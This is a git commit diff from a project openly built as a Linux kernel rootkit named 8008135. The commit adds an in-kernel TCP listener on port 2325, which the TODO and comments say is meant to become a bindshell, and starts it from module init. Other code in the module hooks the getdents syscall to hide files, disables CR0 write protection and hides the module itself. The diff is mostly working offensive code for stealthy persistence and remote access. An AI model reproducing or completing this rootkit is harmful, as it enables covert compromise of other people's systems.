valentin_lechner/8008135
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity

Merge branch 'dev_vlr'

Browse Source
This commit is contained in:
Valentin Lechner 2019-12-05 20:14:10 +01:00
commit f187dc64d3
7 changed files with 615 additions and 7 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

5
Makefile
View File

@ -19,12 +19,13 @@ INCL_H := $(PWD)/$(INCL_S)/headers
obj-m += $(MNAME).o obj-m += $(MNAME).o
# Core # Core
$(MNAME)-y += src/$(MNAME).o $(MNAME)-y += src/$(MNAME).o
$(MNAME)-y += src/50ck3t.o
# Includes for header files etc # Includes for header files etc
ccflags-y := -I$(SRCS_H) -I$(LIBS_H) -I$(INCL_H) ccflags-y := -I$(SRCS_H) -I$(LIBS_H) -I$(INCL_H)
all: all:
$(shell $(SRCS_S)/create_sysgen.sh) $(shell $(SRCS_S)/cr3473_5y563n.sh)
$(MAKE) -C $(BUILDDIR) M=$(PWD) modules $(MAKE) -C $(BUILDDIR) M=$(PWD) modules
load: load:
@ -34,5 +35,5 @@ unload:
rmmod $(MNAME) rmmod $(MNAME)
clean: clean:
-rm $(SRCS_H)/sysgen.h -rm $(SRCS_H)/5y563n.h
$(MAKE) -C $(BUILDDIR) M=$(PWD) clean $(MAKE) -C $(BUILDDIR) M=$(PWD) clean

10
TODO.md Normal file
View File

@ -0,0 +1,10 @@
# Pick One
## TCP Socket
* Add binding to shell:
* Incoming commands have to be redir to bash
* STDOUT, STDIN, STDERR Handling
* Remove chat, debug stuff
* Hide open Port
## Module
* Hide itself

544
src/50ck3t.c Normal file
View File

@ -0,0 +1,544 @@
/*
*
* NOTE:
* this is basically this guys code:
* https://github.com/abysamross/simple-linux-kernel-tcp-client-server.git
* his last update was 4 years ago, so there might be some changes,
* there definitely will be some regarding the data received/sent back since
* this is will be used as a bindshell
* but base is his work.
*
*/
/* -*- Mode: C; indent-tabs-mode: t; c-basic-offset: 4; tab-width: 4 -*- */
/*
* main.c
* Copyright (C) 2019
*
* 8008135 is free software: you can redistribute it and/or modify it
* under the terms of the GNU General Public License as published by the
* Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* 8008135 is distributed in the hope that it will be useful, but
* WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
* See the GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License along
* with this program. If not, see <http://www.gnu.org/licenses/>.
*/
/**** includes *****************************************************************
*******************************************************************************/
#include "50ck3t.h"
/**** types *******************************************************************
*******************************************************************************/
struct tcp_conn_handler_data{
struct sockaddr_in *FAddress;
struct socket *FAcceptSocket;
int FThreadID;
};
struct tcp_conn_handler{
struct tcp_conn_handler_data *data[MAX_CONNS];
struct task_struct *thread[MAX_CONNS];
int tcp_conn_handler_stopped[MAX_CONNS];
};
struct tcp_conn_handler *STCPConnHandler;
struct tcp_server_service{
int FRunning;
struct socket *FListenSocket;
struct task_struct *FThread;
struct task_struct *FAccpeptThread;
};
struct tcp_server_service *FTCPServer_Service;
/**** var **********************************************************************
*******************************************************************************/
static int STCPListenerStopped = 0;
static int STCPAcceptorStopped = 0;
char *inet_ntoa(struct in_addr *AInAddr){
char *LIPAddr = NULL;
u_int32_t LIPInt = 0;
LIPAddr = kmalloc(16 * sizeof(char), GFP_KERNEL);
if(!LIPAddr)
return NULL;
else
memset(LIPAddr, 0, 16);
LIPInt = AInAddr->s_addr;
sprintf(LIPAddr, "%d.%d.%d.%d", (LIPInt) & 0xFF, (LIPInt >> 8) & 0xFF,
(LIPInt >> 16) & 0xFF, (LIPInt >> 16) & 0xFF);
return LIPAddr;
}
int tcp_server_send(struct socket *ASocket, int AID, const char *ABuf,\
const size_t ALength, unsigned long AFlags){
struct msghdr LMsgHeader;
struct kvec LVec;
int LLen, LWritten, LLeft;
mm_segment_t LOldMM;
LWritten = 0;
LLeft = ALength;
LMsgHeader.msg_name = 0;
LMsgHeader.msg_namelen = 0;
LMsgHeader.msg_control = NULL;
LMsgHeader.msg_controllen = 0;
LMsgHeader.msg_flags = AFlags;
LMsgHeader.msg_flags = 0;
LOldMM = get_fs(); set_fs(KERNEL_DS);
repeat_send:
LVec.iov_len = LLeft;
LVec.iov_base = (char *)ABuf + LWritten;
LLen = kernel_sendmsg(ASocket, &LMsgHeader, &LVec, LLeft, LLeft);
if((LLen == -ERESTARTSYS) || (!(AFlags & MSG_DONTWAIT) &&\
(LLen == -EAGAIN)))
goto repeat_send;
if(LLen > 0){
LWritten += LLen;
LLeft -= LLen;
if(LLeft)
goto repeat_send;
}
set_fs(LOldMM);
return LWritten?LWritten:LLen;
}
int tcp_server_receive(struct socket *ASock, int AID,struct sockaddr_in *AAddress,\
unsigned char *ABuf,int ASize, unsigned long AFlags){
struct msghdr LMsgHeader;
struct kvec LVec;
int LLen;
char *LTmp = NULL;
if(ASock==NULL){
pr_info(" *** mtp | tcp server receive socket is NULL| "
" tcp_server_receive *** \n");
return -1;
}
LMsgHeader.msg_name = 0;
LMsgHeader.msg_namelen = 0;
LMsgHeader.msg_control = NULL;
LMsgHeader.msg_controllen = 0;
LMsgHeader.msg_flags = AFlags;
LVec.iov_len = ASize;
LVec.iov_base = ABuf;
read_again:
if(!skb_queue_empty(&ASock->sk->sk_receive_queue))
pr_info("recv queue empty ? %s \n",
skb_queue_empty(&ASock->sk->sk_receive_queue)?"yes":"no");
LLen = kernel_recvmsg(ASock, &LMsgHeader, &LVec, ASize, ASize, AFlags);
if(LLen == -EAGAIN || LLen == -ERESTARTSYS)
goto read_again;
LTmp = inet_ntoa(&(AAddress->sin_addr));
pr_info("client-> %s:%d, says: %s\n", LTmp, ntohs(AAddress->sin_port), ABuf);
kfree(LTmp);
return LLen;
}
int connection_handler(void *AData){
struct tcp_conn_handler_data *LConnData =
(struct tcp_conn_handler_data *)AData;
struct sockaddr_in *LAddress = LConnData->FAddress;
struct socket *LAcceptSocket = LConnData->FAcceptSocket;
int LID = LConnData->FThreadID;
int LRet;
int LLen = 49;
unsigned char LInBuf[LLen+1];
unsigned char LOutBuf[LLen+1];
DECLARE_WAITQUEUE(recv_wait, current);
allow_signal(SIGKILL|SIGSTOP);
while(1){
add_wait_queue(&LAcceptSocket->sk->sk_wq->wait, &recv_wait);
while(skb_queue_empty(&LAcceptSocket->sk->sk_receive_queue)){
__set_current_state(TASK_INTERRUPTIBLE);
schedule_timeout(HZ);
if(kthread_should_stop()){
pr_info(" *** mtp | tcp server handle connection "
"thread stopped | connection_handler *** \n");
//tcp_conn_handler->thread[id] = NULL;
STCPConnHandler->tcp_conn_handler_stopped[LID]= 1;
__set_current_state(TASK_RUNNING);
remove_wait_queue(&LAcceptSocket->sk->sk_wq->wait,\
&recv_wait);
kfree(STCPConnHandler->data[LID]->FAddress);
kfree(STCPConnHandler->data[LID]);
sock_release(STCPConnHandler->data[LID]->FAcceptSocket);
return 0;
}
if(signal_pending(current)){
__set_current_state(TASK_RUNNING);
remove_wait_queue(&LAcceptSocket->sk->sk_wq->wait,\
&recv_wait);
goto out;
}
}
__set_current_state(TASK_RUNNING);
remove_wait_queue(&LAcceptSocket->sk->sk_wq->wait, &recv_wait);
pr_info("receiving message\n");
memset(LInBuf, 0, LLen+1);
LRet = tcp_server_receive(LAcceptSocket, LID, LAddress, LInBuf, LLen,\
MSG_DONTWAIT);
if(LRet > 0){
if(memcmp(LInBuf, "HOLA", 4) == 0){
memset(LOutBuf, 0, LLen+1);
strcat(LOutBuf, "HOLASI");
pr_info("sending response: %s\n", LOutBuf);
tcp_server_send(LAcceptSocket, LID, LOutBuf,\
strlen(LOutBuf), MSG_DONTWAIT);
}
if(memcmp(LInBuf, "ADIOS", 5) == 0){
memset(LOutBuf, 0, LLen+1);
strcat(LOutBuf, "ADIOSAMIGO");
pr_info("sending response: %s\n", LOutBuf);
tcp_server_send(LAcceptSocket, LID, LOutBuf,\
strlen(LOutBuf), MSG_DONTWAIT);
break;
}
}
}
out:
STCPConnHandler->tcp_conn_handler_stopped[LID]= 1;
kfree(STCPConnHandler->data[LID]->FAddress);
kfree(STCPConnHandler->data[LID]);
sock_release(STCPConnHandler->data[LID]->FAcceptSocket);
STCPConnHandler->thread[LID] = NULL;
do_exit(0);
}
int tcp_server_accept(void){
int LAcceptErr = 0;
struct socket *LSocket;
struct socket *LAcceptSocket = NULL;
struct inet_connection_sock *LISock;
int LID = 0;
DECLARE_WAITQUEUE(accept_wait, current);
allow_signal(SIGKILL|SIGSTOP);
LSocket = FTCPServer_Service->FListenSocket;
pr_info(" *** mtp | creating the accept socket | tcp_server_accept "
"*** \n");
while(1){
struct tcp_conn_handler_data *LTCPConnHData = NULL;
struct sockaddr_in *LClient = NULL;
char *LTmp;
int addr_len;
LAcceptErr =
sock_create(LSocket->sk->sk_family, LSocket->type,\
LSocket->sk->sk_protocol, &LAcceptSocket);
if(LAcceptErr < 0 || !LAcceptSocket){
pr_info(" *** mtp | accept_error: %d while creating "
"tcp server accept socket | "
"tcp_server_accept *** \n", LAcceptErr);
goto err;
}
LAcceptSocket->type = LSocket->type;
LAcceptSocket->ops = LSocket->ops;
LISock = inet_csk(LSocket->sk);
add_wait_queue(&LSocket->sk->sk_wq->wait, &accept_wait);
while(reqsk_queue_empty(&LISock->icsk_accept_queue)){
__set_current_state(TASK_INTERRUPTIBLE);
schedule_timeout(HZ);
if(kthread_should_stop()){
pr_info(" *** mtp | tcp server acceptor thread "
"stopped | tcp_server_accept *** \n");
STCPAcceptorStopped = 1;
__set_current_state(TASK_RUNNING);
remove_wait_queue(&LSocket->sk->sk_wq->wait,\
&accept_wait);
sock_release(LAcceptSocket);
return 0;
}
if(signal_pending(current)){
__set_current_state(TASK_RUNNING);
remove_wait_queue(&LSocket->sk->sk_wq->wait,\
&accept_wait);
goto release;
}
}
__set_current_state(TASK_RUNNING);
remove_wait_queue(&LSocket->sk->sk_wq->wait, &accept_wait);
pr_info("accept connection\n");
LAcceptErr =
LSocket->ops->accept(LSocket, LAcceptSocket, O_NONBLOCK);
if(LAcceptErr < 0){
pr_info(" *** mtp | accept_error: %d while accepting "
"tcp server | tcp_server_accept *** \n",
LAcceptErr);
goto release;
}
LClient = kmalloc(sizeof(struct sockaddr_in), GFP_KERNEL);
memset(LClient, 0, sizeof(struct sockaddr_in));
addr_len = sizeof(struct sockaddr_in);
LAcceptErr =
LAcceptSocket->ops->getname(LAcceptSocket,\
(struct sockaddr *)LClient,\
&addr_len, 2);
if(LAcceptErr < 0){
pr_info(" *** mtp | accept_error: %d in getname "
"tcp server | tcp_server_accept *** \n",
LAcceptErr);
goto release;
}
LTmp = inet_ntoa(&(LClient->sin_addr));
pr_info("connection from: %s %d \n",
LTmp, ntohs(LClient->sin_port));
kfree(LTmp);
pr_info("handle connection\n");
for(LID = 0; LID < MAX_CONNS; LID++){
if(STCPConnHandler->thread[LID] == NULL)
break;
}
pr_info("gave free id: %d\n", LID);
if(LID == MAX_CONNS)
goto release;
LTCPConnHData = kmalloc(sizeof(struct tcp_conn_handler_data), GFP_KERNEL);
memset(LTCPConnHData, 0, sizeof(struct tcp_conn_handler_data));
LTCPConnHData->FAddress = LClient;
LTCPConnHData->FAcceptSocket = LAcceptSocket;
LTCPConnHData->FThreadID = LID;
STCPConnHandler->tcp_conn_handler_stopped[LID] = 0;
STCPConnHandler->data[LID] = LTCPConnHData;
STCPConnHandler->thread[LID] =
kthread_run((void *)connection_handler, (void *)LTCPConnHData, MODULE_NAME);
if(kthread_should_stop()){
pr_info(" *** mtp | tcp server acceptor thread stopped"
" | tcp_server_accept *** \n");
STCPAcceptorStopped = 1;
return 0;
}
if(signal_pending(current)){
break;
}
}
STCPAcceptorStopped = 1;
do_exit(0);
release:
sock_release(LAcceptSocket);
err:
STCPAcceptorStopped = 1;
do_exit(0);
}
int tcp_server_listen(void)
{
int LServerErr;
struct socket *LConnSocket;
struct sockaddr_in LServer;
DECLARE_WAIT_QUEUE_HEAD(wq);
allow_signal(SIGKILL|SIGTERM);
LServerErr = sock_create(PF_INET, SOCK_STREAM, IPPROTO_TCP,\
&FTCPServer_Service->FListenSocket);
if(LServerErr < 0){
pr_info(" *** mtp | Error: %d while creating tcp server "
"listen socket | tcp_server_listen *** \n", LServerErr);
goto err;
}
LConnSocket = FTCPServer_Service->FListenSocket;
FTCPServer_Service->FListenSocket->sk->sk_reuse = 1;
LServer.sin_addr.s_addr = INADDR_ANY;
LServer.sin_family = AF_INET;
LServer.sin_port = htons(DEFAULT_PORT);
LServerErr =
LConnSocket->ops->bind(LConnSocket, (struct sockaddr*)&LServer,\
sizeof(LServer));
if(LServerErr < 0){
pr_info(" *** mtp | Error: %d while binding tcp server "
"listen socket | tcp_server_listen *** \n", LServerErr);
goto release;
}
LServerErr = LConnSocket->ops->listen(LConnSocket, 16);
if(LServerErr < 0){
pr_info(" *** mtp | Error: %d while listening in tcp "
"server listen socket | tcp_server_listen "
"*** \n", LServerErr);
goto release;
}
FTCPServer_Service->FAccpeptThread =
kthread_run((void*)tcp_server_accept, NULL, MODULE_NAME);
while(1){
wait_event_timeout(wq, 0, 3*HZ);
if(kthread_should_stop()){
pr_info(" *** mtp | tcp server listening thread"
" stopped | tcp_server_listen *** \n");
return 0;
}
if(signal_pending(current))
goto release;
}
sock_release(LConnSocket);
STCPListenerStopped = 1;
do_exit(0);
release:
sock_release(LConnSocket);
err:
STCPListenerStopped = 1;
do_exit(0);
}
int tcp_server_start(void){
FTCPServer_Service->FRunning = 1;
FTCPServer_Service->FThread = kthread_run((void *)tcp_server_listen, NULL,\
MODULE_NAME);
return 0;
}
int network_server_init(void){
pr_info(" *** mtp | network_server initiated | "
"network_server_init ***\n");
FTCPServer_Service = kmalloc(sizeof(struct tcp_server_service), GFP_KERNEL);
memset(FTCPServer_Service, 0, sizeof(struct tcp_server_service));
STCPConnHandler = kmalloc(sizeof(struct tcp_conn_handler), GFP_KERNEL);
memset(STCPConnHandler, 0, sizeof(struct tcp_conn_handler));
tcp_server_start();
return 0;
}
void network_server_exit(void){
int ret;
int id;
if(FTCPServer_Service->FThread == NULL)
pr_info(" *** mtp | No kernel thread to kill | "
"network_server_exit *** \n");
else
{
for(id = 0; id < MAX_CONNS; id++)
{
if(STCPConnHandler->thread[id] != NULL)
{
if(!STCPConnHandler->tcp_conn_handler_stopped[id])
{
ret =
kthread_stop(STCPConnHandler->thread[id]);
if(!ret)
pr_info(" *** mtp | tcp server "
"connection handler thread: %d "
"stopped | network_server_exit "
"*** \n", id);
}
}
}
if(!STCPAcceptorStopped)
{
ret = kthread_stop(FTCPServer_Service->FAccpeptThread);
if(!ret)
pr_info(" *** mtp | tcp server acceptor thread"
" stopped | network_server_exit *** \n");
}
if(!STCPListenerStopped)
{
ret = kthread_stop(FTCPServer_Service->FThread);
if(!ret)
pr_info(" *** mtp | tcp server listening thread"
" stopped | network_server_exit *** \n");
}
if(FTCPServer_Service->FListenSocket != NULL && !STCPListenerStopped)
{
sock_release(FTCPServer_Service->FListenSocket);
FTCPServer_Service->FListenSocket = NULL;
}
kfree(STCPConnHandler);
kfree(FTCPServer_Service);
FTCPServer_Service = NULL;
}
}

7
src/8008135.c
View File

@ -20,6 +20,7 @@
/**** includes ***************************************************************** /**** includes *****************************************************************
*******************************************************************************/ *******************************************************************************/
#include "8008135.h" #include "8008135.h"
#include "50ck3t.h"
/**** var ******************************************************************** /**** var ********************************************************************
*******************************************************************************/ *******************************************************************************/
@ -33,7 +34,7 @@ sys_getdents_t sys_getdents_orig = NULL;
*******************************************************************************/ *******************************************************************************/
asmlinkage long sys_getdents_new(unsigned int fd, asmlinkage long sys_getdents_new(unsigned int fd,
struct linux_dirent __user *dirent, struct linux_dirent __user *dirent,
unsigned int count) { unsigned int count){
int boff; int boff;
struct linux_dirent* ent; struct linux_dirent* ent;
@ -54,7 +55,7 @@ asmlinkage long sys_getdents_new(unsigned int fd,
// if it has hide prefix or module name anywhere, hide it // if it has hide prefix or module name anywhere, hide it
if ((strncmp(ent->d_name, HIDE_PREFIX, HIDE_PREFIX_SZ) == 0) if ((strncmp(ent->d_name, HIDE_PREFIX, HIDE_PREFIX_SZ) == 0)
|| (strstr(ent->d_name, MODULE_NAME) != NULL)) { || (strstr(ent->d_name, MODULE_NAME) != NULL)) {
#if defined DEBUG #if defined DEBUG
printk("\n hide prefix or mod name contained!\n"); printk("\n hide prefix or mod name contained!\n");
printk("\n ret %ld\n ", ret); printk("\n ret %ld\n ", ret);
@ -119,6 +120,7 @@ static int __init init_8008135(void) {
write_cr0(read_cr0() | WRITE_PROTECT_FLAG); write_cr0(read_cr0() | WRITE_PROTECT_FLAG);
printk(KERN_INFO "New syscall in place\n"); printk(KERN_INFO "New syscall in place\n");
network_server_init();
hide_module(); hide_module();
printk(KERN_INFO "Module hidden"); printk(KERN_INFO "Module hidden");
@ -133,6 +135,7 @@ static int __init init_8008135(void) {
* RETURNS: - * RETURNS: -
*******************************************************************************/ *******************************************************************************/
static void __exit exit_8008135(void) { static void __exit exit_8008135(void) {
network_server_exit();
// allow us to write to read onlu pages // allow us to write to read onlu pages
write_cr0(read_cr0() & (~WRITE_PROTECT_FLAG)); write_cr0(read_cr0() & (~WRITE_PROTECT_FLAG));
// set getdents handler back // set getdents handler back

2
src/create_sysgen.sh → src/cr3473_5y563n.sh
View File

@ -1,7 +1,7 @@
#!/usr/bin/env bash #!/usr/bin/env bash
SCRIPTPATH="$( cd "$(dirname "$0")" ; pwd -P )" SCRIPTPATH="$( cd "$(dirname "$0")" ; pwd -P )"
SRCS_H="$SCRIPTPATH""/headers" SRCS_H="$SCRIPTPATH""/headers"
SGENH="$SRCS_H""/sysgen.h" SGENH="$SRCS_H""/5y563n.h"
smap="/boot/System.map-$(uname -r)" smap="/boot/System.map-$(uname -r)"

50
src/headers/50ck3t.h Normal file
View File

@ -0,0 +1,50 @@
/* -*- Mode: C; indent-tabs-mode: t; c-basic-offset: 4; tab-width: 4 -*- */
/*
* main.c
* Copyright (C) 2019
*
* 8008135 is free software: you can redistribute it and/or modify it
* under the terms of the GNU General Public License as published by the
* Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* 8008135 is distributed in the hope that it will be useful, but
* WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
* See the GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License along
* with this program. If not, see <http://www.gnu.org/licenses/>.
*/
#ifndef SRC_HEADERS_50CK3T_H_
#define SRC_HEADERS_50CK3T_H_
/**** includes *****************************************************************
*******************************************************************************/
#include <linux/init.h>
#include <linux/slab.h>
#include <linux/kthread.h>
#include <linux/errno.h>
#include <linux/types.h>
#include <linux/netdevice.h>
#include <linux/ip.h>
#include <linux/in.h>
#include <linux/unistd.h>
#include <linux/wait.h>
#include <net/sock.h>
#include <net/tcp.h>
#include <net/inet_connection_sock.h>
#include <net/request_sock.h>
#define DEFAULT_PORT 2325
#define MAX_CONNS 16
#define MODULE_NAME "8008135"
int network_server_init(void);
void network_server_exit(void);
#endif /* SRC_HEADERS_50CK3T_H_ */

4
src/headers/8008135.h
View File

@ -26,7 +26,7 @@
#include <asm/special_insns.h> #include <asm/special_insns.h>
#include <linux/string.h> #include <linux/string.h>
#include <linux/fs.h> #include <linux/fs.h>
#include "sysgen.h" #include "5y563n.h"
/**** Defines ***************************************************************** /**** Defines *****************************************************************
@ -44,7 +44,7 @@
/**** Modinfo **************************************************************** /**** Modinfo ****************************************************************
*******************************************************************************/ *******************************************************************************/
MODULE_LICENSE("GPLv3"); MODULE_LICENSE("GPL");
MODULE_AUTHOR("JanKoernerEnterprises"); MODULE_AUTHOR("JanKoernerEnterprises");
MODULE_DESCRIPTION("8008135"); MODULE_DESCRIPTION("8008135");
MODULE_VERSION("0.1"); MODULE_VERSION("0.1");